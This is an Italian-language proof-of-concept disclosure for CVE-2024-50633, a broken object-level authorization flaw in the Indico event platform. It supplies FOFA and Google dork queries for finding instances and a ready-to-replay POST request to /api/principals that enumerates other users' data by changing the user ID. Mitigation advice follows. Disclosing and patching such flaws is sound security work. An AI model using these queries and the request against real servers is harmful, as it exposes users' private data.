
Proof-of-concept exploit per CVE-2024-50633, una vulnerabilità di Broken Object Level Authorization (BOLA) in Indico v3.2.9–v3.3.2, che consente l'accesso non autorizzato a dati sensibili degli utenti tramite richieste API appositamente create.
(Scoperta e segnalazione di una vulnerabilità BOLA in Indico.)
Una vulnerabilità Broken Object Level Authorization (BOLA) in Indico v3.2.9 consente agli attaccanti di accedere a informazioni sensibili degli utenti manipolando le richieste API.
FOFA : title="Indico" || header="Indico"
Google Dork : intitle:"Indico" inurl:"/event"
/api/principalsPOST /api/principals HTTP/2
Content-Type: application/json
{
"values": ["User:2301"]
}
Modificando il valore User (es. User:2302), l’attaccante può accedere ai dati di un altro utente. Passaggi per riprodurre:
🔥 Impatto Questa vulnerabilità può esporre informazioni sensibili di altri utenti. Infrange i confini di autorizzazione, portando a potenziali fughe di dati.
⚙️ Versioni Affette Indico v3.2.9 to v3.3.2
🔧 Come Risolvere? per [CVE-2024-50633]
Aggiorna all'Ultima Versione: Assicurati che la tua istanza Indico sia aggiornata all'ultima versione patchata in cui la vulnerabilità è stata risolta. Controlla le release ufficiali di Indico per gli aggiornamenti.
Limita l'Accesso agli Endpoint Sensibili: Applica controlli di accesso rigorosi sugli endpoint API come /api/principals per garantire che solo utenti autorizzati possano accedere alle informazioni sensibili. Utilizza meccanismi di controllo degli accessi basati sui ruoli (RBAC).
Implementa la Validazione degli Input: Convalida e igienizza l'input fornito dall'utente in tutte le richieste API per prevenire accessi non autorizzati o manipolazioni dei dati.
Monitora e Controlla i Log: Monitora regolarmente i log del server per richieste API anomale o tentativi di accesso non autorizzato a /api/principals. Questo può aiutare a identificare tentativi di sfruttamento.
Usa un Web Application Firewall (WAF): Distribuire un WAF può fornire un ulteriore livello di protezione contro i tentativi di sfruttamento, rilevando e bloccando richieste dannose.
🕵️♂️ Segnalato da Çetin BİNİCİ